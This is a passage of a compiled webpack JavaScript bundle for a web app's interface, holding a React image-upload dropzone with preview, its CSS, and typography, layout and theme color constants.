var cx = __WEBPACK_IMPORTED_MODULE_3_classnames_bind___default.a.bind(__WEBPACK_IMPORTED_MODULE_4__PreviewDropzone_styl___default.a);





var PreviewDropzone = function (_React$Component) {
  _inherits(PreviewDropzone, _React$Component);

  function PreviewDropzone() {
    var _ref;

    var _temp, _this, _ret;

    _classCallCheck(this, PreviewDropzone);

    for (var _len = arguments.length, args = Array(_len), _key = 0; _key < _len; _key++) {
      args[_key] = arguments[_key];
    }

    return _ret = (_temp = (_this = _possibleConstructorReturn(this, (_ref = PreviewDropzone.__proto__ || Object.getPrototypeOf(PreviewDropzone)).call.apply(_ref, [this].concat(args))), _this), _this.state = {
      imagePreviewUrl: null
    }, _this.storeImage = function (files) {
      var file = files[0];
      _this.props.setFile(file);
      _this.setPreview(file);
    }, _this.removeImage = function () {
      _this.props.setFile(null);
    }, _this.imagePreviewUrl = function () {
      var existing = _this.props.existingImageUrl;
      if (existing) {
        return existing;
      } else {
        return _this.state.imagePreviewUrl;
      }
    }, _this.setPreview = function (file) {
      // used to render an image preview upon file drop
      var reader = new FileReader();
      reader.onloadend = function () {
        _this.setState({
          imagePreviewUrl: reader.result
        });
      };
      reader.readAsDataURL(file);
    }, _this.handleUploadRejected = function (files) {
      _this.props.onError('Make sure the image is the appropriate format and size.');
    }, _this.onRemoveContent = function () {
      if (_this.props.imageFile) {
        _this.removeImage();
      } else {
        _this.props.clearExistingImageUrl();
        _this.setState({
          imagePreviewUrl: null
        });
      }
    }, _temp), _possibleConstructorReturn(_this, _ret);
  }

  _createClass(PreviewDropzone, [{
    key: 'componentDidMount',
    value: function componentDidMount() {
      // if a file is passed initially, set it
      if (this.props.imageFile) {
        this.setPreview(this.props.imageFile);
      }
    }

    // handles icon uploading errors


    // Deletes dropped file in the Dropzone component

  }, {
    key: 'render',
    value: function render() {

      var imagePreviewUrl = this.imagePreviewUrl();

      if (!imagePreviewUrl) {
        return __WEBPACK_IMPORTED_MODULE_7_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_1__Dropzone_js__["a" /* Dropzone */], _extends({}, Object(__WEBPACK_IMPORTED_MODULE_0_ramda__["omit"])(['imageFile', 'existingImageUrl', 'setFile', 'clearExistingImageUrl', 'onError'], this.props), {
          onDropRejected: this.handleUploadRejected,
          onDropAccepted: this.storeImage
        }));
      } else {

        var file = this.props.imageFile;
        var filename = file ? file.name : 'Current Icon';

        return __WEBPACK_IMPORTED_MODULE_7_react___default.a.createElement(
          'div',
          { className: cx('imgUrl') },
          __WEBPACK_IMPORTED_MODULE_7_react___default.a.createElement('img', { src: imagePreviewUrl }),
          __WEBPACK_IMPORTED_MODULE_7_react___default.a.createElement(
            __WEBPACK_IMPORTED_MODULE_5_trustar_2_0_components_Button__["d" /* IconButton */],
            { icon: __WEBPACK_IMPORTED_MODULE_6_trustar_2_0_components__["s" /* IconLookup */].TRASH2, transparent: true, size: 'small', className: cx('remove'), onClick: this.onRemoveContent, type: 'button' },
            __WEBPACK_IMPORTED_MODULE_7_react___default.a.createElement(
              'strong',
              null,
              filename
            ),
            file && __WEBPACK_IMPORTED_MODULE_7_react___default.a.createElement(
              'span',
              { style: { marginLeft: 10 } },
              Object(__WEBPACK_IMPORTED_MODULE_2_trustar_utils_utils__["formatFilesize"])(file.size)
            )
          )
        );
      }
    }
  }]);

  return PreviewDropzone;
}(__WEBPACK_IMPORTED_MODULE_7_react___default.a.Component);

/***/ }),
/* 3489 */
/***/ (function(module, exports, __webpack_require__) {

// style-loader: Adds some css to the DOM by adding a <style> tag

// load the styles
var content = __webpack_require__(3490);
if(typeof content === 'string') content = [[module.i, content, '']];
// Prepare cssTransformation
var transform;

var options = {"hmr":true}
options.transform = transform
// add the styles to the DOM
var update = __webpack_require__(28)(content, options);
if(content.locals) module.exports = content.locals;
// Hot Module Replacement
if(false) {
	// When the styles change, update the <style> tags
	if(!content.locals) {
		module.hot.accept("!!../../../node_modules/css-loader/index.js??ref--2-1!../../../node_modules/postcss-loader/src/index.js??ref--2-2!../../../node_modules/stylus-loader/index.js!./PreviewDropzone.styl", function() {
			var newContent = require("!!../../../node_modules/css-loader/index.js??ref--2-1!../../../node_modules/postcss-loader/src/index.js??ref--2-2!../../../node_modules/stylus-loader/index.js!./PreviewDropzone.styl");
			if(typeof newContent === 'string') newContent = [[module.id, newContent, '']];
			update(newContent);
		});
	}
	// When the module is disposed, remove the <style> tags
	module.hot.dispose(function() { update(); });
}

/***/ }),
/* 3490 */
/***/ (function(module, exports, __webpack_require__) {

exports = module.exports = __webpack_require__(27)(undefined);
// imports


// module
exports.push([module.i, ".PreviewDropzone__imgUrl__2ox09Y {\n  font-size: 10px;\n  margin: 10px 0;\n  padding: 10px;\n  text-align: center;\n  background-color: #e8e8e8;\n  border-radius: 3px;\n  border: dotted 3px #d3d3d3;\n  color: #4a4a4a;\n}\n.PreviewDropzone__imgUrl__2ox09Y img {\n  width: 30%;\n  height: 30%;\n  border-radius: 3px;\n}\n.PreviewDropzone__imgUrl__2ox09Y button {\n  margin: 0 auto;\n  text-align: center;\n}\n", ""]);

// exports
exports.locals = {
	"imgUrl": "PreviewDropzone__imgUrl__2ox09Y"
};

/***/ }),
/* 3491 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return FontSizes; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return FontWeights; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "d", function() { return LineHeights; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return FontFamilies; });
var FontSizes = {
  BASE: '1rem',
  BODY: '12px',
  HEADING: '2rem',
  H1: '2rem',
  H2: '1.5rem',
  H3: '1.167rem',
  H4: '1rem',
  H5: '0.833rem',
  H6: '0.667rem',
  P: '1rem',
  FINE_PRINT: '0.833rem'
};

var FontWeights = {
  BASE: 400,
  LIGHT: 300,
  NORMAL: 400,
  BOLD: 700
};

var LineHeights = {
  BASE: '1.8'
};

var FontFamilies = {
  DEFAULT: ['Open Sans', 'Helvetica Neue', 'Helvetica', 'Arial', 'sans-serif']
};

/***/ }),
/* 3492 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return Widths; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return Heights; });
var Widths = {
  FILTER_BOX: '18.8rem',
  FILTER_BAR_WIDTH: '22rem',
  SIDE_NAV_WIDTH: '5.5rem',
  REPORTS_PANEL_WIDTH: '25rem',
  DETAILS_WIDTH: '39.6rem',
  SETTINGS_NAV_BAR: '124px',
  CARD_WIDTH: '40rem'
};
var Heights = {
  APP_HEADER: '70px',
  MENU_BAR: '240px'
};

/***/ }),
/* 3493 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "PRIMARY", function() { return PRIMARY; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SECONDARY", function() { return SECONDARY; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "TERTIARY", function() { return TERTIARY; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "BRAND_PRIMARY", function() { return BRAND_PRIMARY; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "BRAND_SECONDARY", function() { return BRAND_SECONDARY; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SUCCESS", function() { return SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "INFO", function() { return INFO; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "WARNING", function() { return WARNING; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "DANGER", function() { return DANGER; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "LIGHT", function() { return LIGHT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "DARK", function() { return DARK; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "BLACK", function() { return BLACK; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "WHITE", function() { return WHITE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "CONTRAST", function() { return CONTRAST; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "TEXT", function() { return TEXT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "TEXT_INVERSE", function() { return TEXT_INVERSE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "LINK_TEXT", function() { return LINK_TEXT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SURFACE_LIGHTER", function() { return SURFACE_LIGHTER; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SURFACE", function() { return SURFACE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SURFACE_INVERSE", function() { return SURFACE_INVERSE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SURFACE_LIGHTEST", function() { return SURFACE_LIGHTEST; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "DARK_SURFACE_LIGHTER", function() { return DARK_SURFACE_LIGHTER; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "INPUT_DISABLED", function() { return INPUT_DISABLED; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "BOX_SHADOW", function() { return BOX_SHADOW; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "BORDER", function() { return BORDER; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "DROPDOWN_SHADOW", function() { return DROPDOWN_SHADOW; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "LIGHT_GRAY_SURFACE", function() { return LIGHT_GRAY_SURFACE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SEARCH_RESULTS", function() { return SEARCH_RESULTS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SEARCH_BAR", function() { return SEARCH_BAR; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SEARCH_BAR_INPUT", function() { return SEARCH_BAR_INPUT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SEARCH_FILTER_BAR", function() { return SEARCH_FILTER_BAR; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SEARCH_FILTER_BAR_BUTTON", function() { return SEARCH_FILTER_BAR_BUTTON; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SIDE_NAV_BAR", function() { return SIDE_NAV_BAR; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SIDE_NAV_BAR_HOVER", function() { return SIDE_NAV_BAR_HOVER; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SIDE_NAV_DROPRIGHT_MENU_ITEM", function() { return SIDE_NAV_DROPRIGHT_MENU_ITEM; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SETTINGS_PAGE_NAVLINK", function() { return SETTINGS_PAGE_NAVLINK; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__common_colorNames__ = __webpack_require__(207);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__common_util__ = __webpack_require__(378);



var PRIMARY = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["MARINER"];
var SECONDARY = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["THUNDER"];
var TERTIARY = Object.assign({}, __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["WHITE"], { buttonText: PRIMARY.hex }); // Tertiary is always white button blue background
var BRAND_PRIMARY = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["MARINER"];
var BRAND_SECONDARY = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["ATOMIC_TANGERINE"];
var SUCCESS = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["GREEN_LEAF"];
var INFO = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["HAVELOCK_BLUE"];
var WARNING = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["BUTTERCUP"];
var DANGER = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["MONZA"];
var LIGHT = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["ATHENS_GRAY"];
var DARK = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["FJORD"];
var BLACK = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["BLACK"];
var WHITE = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["WHITE"];
var CONTRAST = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["ATHENS_GRAY"];
var TEXT = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["ALABASTER"];
var TEXT_INVERSE = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["FJORD"];
var LINK_TEXT = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["MARINER"];
var SURFACE_LIGHTER = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["MINE_SHAFT"]; // WAS FJORED
var SURFACE = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["THUNDER"]; // WAS FJORED
var SURFACE_INVERSE = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["WHITE"];
var SURFACE_LIGHTEST = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["TUNDORA"];
var DARK_SURFACE_LIGHTER = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["TUNDORA"];
var INPUT_DISABLED = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["BLACK"];
var BOX_SHADOW = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["ATHENS_GRAY"];
var BORDER = Object(__WEBPACK_IMPORTED_MODULE_1__common_util__["e" /* makeBaseHex */])(__WEBPACK_IMPORTED_MODULE_0__common_colorNames__["MINE_SHAFT"], 'X500'); // Shifts the default for this theme
var DROPDOWN_SHADOW = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["THUNDER"];
var LIGHT_GRAY_SURFACE = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["TUNDORA"];

/* -------------- Component Specific Styles -------------- */

// Search / Reports / Entities Page
var SEARCH_RESULTS = {
  TITLE: __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["MARINER"].X200
};
var SEARCH_BAR = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["TUNDORA"];
var SEARCH_BAR_INPUT = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["MINE_SHAFT"];
var SEARCH_FILTER_BAR = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["THUNDER"];
var SEARCH_FILTER_BAR_BUTTON = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["FJORD"];

// Main Nav Bar
var SIDE_NAV_BAR = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["THUNDER"];
var SIDE_NAV_BAR_HOVER = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["TUNDORA"];

var SIDE_NAV_DROPRIGHT_MENU_ITEM = {
  BACKGROUND: SURFACE_LIGHTER.hex,
  BACKGROUND_HOVER: SURFACE_LIGHTER.X500,
  TEXT: WHITE.hex,
  TEXT_HOVER: WHITE.hex,
  SHADOW: DROPDOWN_SHADOW.hex
};

// Settings Page

var SETTINGS_PAGE_NAVLINK = SIDE_NAV_DROPRIGHT_MENU_ITEM;

/***/ }),
/* 3494 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "Config", function() { return Config; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__themeColors__ = __webpack_require__(3495);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "ThemeColors", function() { return __WEBPACK_IMPORTED_MODULE_0__themeColors__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__common_colorNames__ = __webpack_require__(207);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "ColorNames", function() { return __WEBPACK_IMPORTED_MODULE_1__common_colorNames__; });






var Config = {
  name: 'Default Theme',
  className: 'trustar'
};

/***/ }),
/* 3495 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "PRIMARY", function() { return PRIMARY; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SECONDARY", function() { return SECONDARY; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "TERTIARY", function() { return TERTIARY; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "BRAND_PRIMARY", function() { return BRAND_PRIMARY; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "BRAND_SECONDARY", function() { return BRAND_SECONDARY; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SUCCESS", function() { return SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "INFO", function() { return INFO; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "WARNING", function() { return WARNING; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "DANGER", function() { return DANGER; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "LIGHT", function() { return LIGHT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "DARK", function() { return DARK; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "CONTRAST", function() { return CONTRAST; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "BLACK", function() { return BLACK; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "WHITE", function() { return WHITE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "TEXT", function() { return TEXT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "TEXT_ACTIVE", function() { return TEXT_ACTIVE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "TEXT_INVERSE", function() { return TEXT_INVERSE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "LINK_TEXT", function() { return LINK_TEXT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SURFACE", function() { return SURFACE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "DARK_SURFACE_LIGHTER", function() { return DARK_SURFACE_LIGHTER; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SURFACE_INVERSE", function() { return SURFACE_INVERSE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SURFACE_LIGHTER", function() { return SURFACE_LIGHTER; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SURFACE_LIGHTEST", function() { return SURFACE_LIGHTEST; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "INPUT_DISABLED", function() { return INPUT_DISABLED; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "BOX_SHADOW", function() { return BOX_SHADOW; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "BORDER", function() { return BORDER; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "LIGHT_GRAY_SURFACE", function() { return LIGHT_GRAY_SURFACE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SEARCH_RESULTS", function() { return SEARCH_RESULTS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SEARCH_BAR", function() { return SEARCH_BAR; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SEARCH_BAR_INPUT", function() { return SEARCH_BAR_INPUT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SEARCH_FILTER_BAR", function() { return SEARCH_FILTER_BAR; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SEARCH_FILTER_BAR_BUTTON", function() { return SEARCH_FILTER_BAR_BUTTON; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SIDE_NAV_BAR", function() { return SIDE_NAV_BAR; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SIDE_NAV_BAR_HOVER", function() { return SIDE_NAV_BAR_HOVER; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SIDE_NAV_DROPRIGHT_MENU_ITEM", function() { return SIDE_NAV_DROPRIGHT_MENU_ITEM; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SETTINGS_PAGE_NAVLINK", function() { return SETTINGS_PAGE_NAVLINK; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__common_colorNames__ = __webpack_require__(207);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__colorsText__ = __webpack_require__(3496);
// -ignore



var PRIMARY = __WEBPACK_IMPORTED_MODULE_1__colorsText__["k" /* INTERACTIVE_PRIMARYACTION */];
var SECONDARY = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["THUNDER"];
var TERTIARY = Object.assign({}, __WEBPACK_IMPORTED_MODULE_1__colorsText__["n" /* NEUTRALS_WHITE */], {
  buttonText: __WEBPACK_IMPORTED_MODULE_1__colorsText__["k" /* INTERACTIVE_PRIMARYACTION */].hex
}); // Tertiary is always white button blue background
var BRAND_PRIMARY = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["MARINER"];
var BRAND_SECONDARY = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["ATOMIC_TANGERINE"];
var SUCCESS = __WEBPACK_IMPORTED_MODULE_1__colorsText__["b" /* ACCENTS_POSITIVE */];
var INFO = __WEBPACK_IMPORTED_MODULE_1__colorsText__["o" /* STATUS_INFO */];
var WARNING = __WEBPACK_IMPORTED_MODULE_1__colorsText__["c" /* ACCENTS_WARNING */];
var DANGER = __WEBPACK_IMPORTED_MODULE_1__colorsText__["a" /* ACCENTS_NEGATIVE */];
var LIGHT = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["ATHENS_GRAY"];
var DARK = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["FJORD"];
var CONTRAST = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["FJORD"];
var BLACK = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["BLACK"];
var WHITE = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["WHITE"];
var TEXT = __WEBPACK_IMPORTED_MODULE_1__colorsText__["g" /* CONTENT_DEFAULT */];
var TEXT_ACTIVE = __WEBPACK_IMPORTED_MODULE_1__colorsText__["f" /* CONTENT_ACTIVE */];
var TEXT_INVERSE = __WEBPACK_IMPORTED_MODULE_1__colorsText__["h" /* CONTENT_INVERTED */];
var LINK_TEXT = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["MARINER"];
var SURFACE = __WEBPACK_IMPORTED_MODULE_1__colorsText__["d" /* BACKGROUND_PAGE */];
var DARK_SURFACE_LIGHTER = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["TUNDORA"];
var SURFACE_INVERSE = __WEBPACK_IMPORTED_MODULE_1__colorsText__["i" /* GREY */];
var SURFACE_LIGHTER = __WEBPACK_IMPORTED_MODULE_1__colorsText__["e" /* BACKGROUND_SECTION */];
var SURFACE_LIGHTEST = __WEBPACK_IMPORTED_MODULE_1__colorsText__["n" /* NEUTRALS_WHITE */];
var INPUT_DISABLED = __WEBPACK_IMPORTED_MODULE_1__colorsText__["j" /* INTERACTIVE_DISABLEDBACKGROUND */];
var BOX_SHADOW = __WEBPACK_IMPORTED_MODULE_1__colorsText__["i" /* GREY */];

// export const BORDER = SplunkColors.INTERACTIVE_DEFAULTBORDER;
var BORDER = __WEBPACK_IMPORTED_MODULE_1__colorsText__["m" /* NEUTRALS_GREY400 */];

var LIGHT_GRAY_SURFACE = __WEBPACK_IMPORTED_MODULE_1__colorsText__["l" /* NEUTRALS_GREY100 */];

/* -------------- Component Specific Styles -------------- */

// Search / Reports / Entities Page
var SEARCH_RESULTS = {
  TITLE: __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["MARINER"].X700
};

var SEARCH_BAR = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["ATHENS_GRAY"];
var SEARCH_BAR_INPUT = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["ATHENS_GRAY"];
var SEARCH_FILTER_BAR = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["ATHENS_GRAY"];
var SEARCH_FILTER_BAR_BUTTON = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["THUNDER"];

// Side Nav Remains Black in Default
var SIDE_NAV_BAR = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["THUNDER"];
var SIDE_NAV_BAR_HOVER = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["TUNDORA"];

// Main Nav Bar
var SIDE_NAV_DROPRIGHT_MENU_ITEM = {
  BACKGROUND: SURFACE.hex,
  BACKGROUND_HOVER: BLACK.X50,
  TEXT: TEXT.hex,
  TEXT_HOVER: TEXT.hex,
  SHADOW: BLACK.X200,
  BORDER_RIGHT: TEXT.hex
};

var SETTINGS_PAGE_NAVLINK = SIDE_NAV_DROPRIGHT_MENU_ITEM;

/***/ }),
/* 3496 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export ACCENTS_ALERT */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return ACCENTS_NEGATIVE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return ACCENTS_POSITIVE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return ACCENTS_WARNING; });
/* unused harmony export BACKGROUND_DIALOG */
/* unused harmony export BACKGROUND_FLOATING */
/* unused harmony export BACKGROUND_NAVIGATION */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "d", function() { return BACKGROUND_PAGE; });
/* unused harmony export BACKGROUND_POPUP */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "e", function() { return BACKGROUND_SECTION; });
/* unused harmony export BACKGROUND_SIDEBAR */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "f", function() { return CONTENT_ACTIVE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "g", function() { return CONTENT_DEFAULT; });
/* unused harmony export CONTENT_DISABLED */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "h", function() { return CONTENT_INVERTED; });
/* unused harmony export CONTENT_MUTED */
/* unused harmony export INTERACTIVE_ACTIVEOVERLAY */
/* unused harmony export INTERACTIVE_DEFAULTBACKGROUND */
/* unused harmony export INTERACTIVE_DEFAULTBORDER */
/* unused harmony export INTERACTIVE_DESTRUCTIVEACTION */
/* unused harmony export INTERACTIVE_DESTRUCTIVEACTIONACTIVE */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "j", function() { return INTERACTIVE_DISABLEDBACKGROUND; });
/* unused harmony export INTERACTIVE_DISABLEDBORDER */
/* unused harmony export INTERACTIVE_FOCUSEDBORDER */
/* unused harmony export INTERACTIVE_HOVERBORDER */
/* unused harmony export INTERACTIVE_HOVEROVERLAY */
/* unused harmony export INTERACTIVE_DRAGOVERLAY */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "k", function() { return INTERACTIVE_PRIMARYACTION; });
/* unused harmony export INTERACTIVE_PRIMARYACTIONACTIVE */
/* unused harmony export INTERACTIVE_SELECTEDBACKGROUNDINVERTED */
/* unused harmony export INTERACTIVE_SELECTEDOVERLAY */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "l", function() { return NEUTRALS_GREY100; });
/* unused harmony export NEUTRALS_GREY200 */
/* unused harmony export NEUTRALS_GREY300 */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "m", function() { return NEUTRALS_GREY400; });
/* unused harmony export NEUTRALS_GREY500 */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "n", function() { return NEUTRALS_WHITE; });
/* unused harmony export SCRIM_BACKGROUND */
/* unused harmony export STATUS_CRITICAL */
/* unused harmony export STATUS_HIGH */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "o", function() { return STATUS_INFO; });
/* unused harmony export STATUS_LOW */
/* unused harmony export STATUS_MEDIUM */
/* unused harmony export STATUS_NORMAL */
/* unused harmony export BLUE */
/* unused harmony export BROWN */
/* unused harmony export GREEN */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "i", function() { return GREY; });
/* unused harmony export ORANGE */
/* unused harmony export PINK */
/* unused harmony export PURPLE */
/* unused harmony export RED */
/* unused harmony export TEAL */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__common_util__ = __webpack_require__(378);


var colorManifest = this;

var ACCENTS_ALERT = { "name": "accents_alert", "buttonText": "#FFF", "hex": "#CF750C", "X900": "#CF750C", "X800": "#CF750C", "X700": "#CF750C", "X600": "#CF750C", "X500": "#CF750C", "X400": "#CF750C", "X300": "#CF750C", "X200": "#CF750C", "X100": "#CF750C", "X50": "#CF750C" };
var ACCENTS_NEGATIVE = { "name": "accents_negative", "buttonText": "#FFF", "hex": "#D41F1F", "X900": "#D41F1F", "X800": "#D41F1F", "X700": "#D41F1F", "X600": "#D41F1F", "X500": "#D41F1F", "X400": "#D41F1F", "X300": "#D41F1F", "X200": "#D41F1F", "X100": "#D41F1F", "X50": "#D41F1F" };
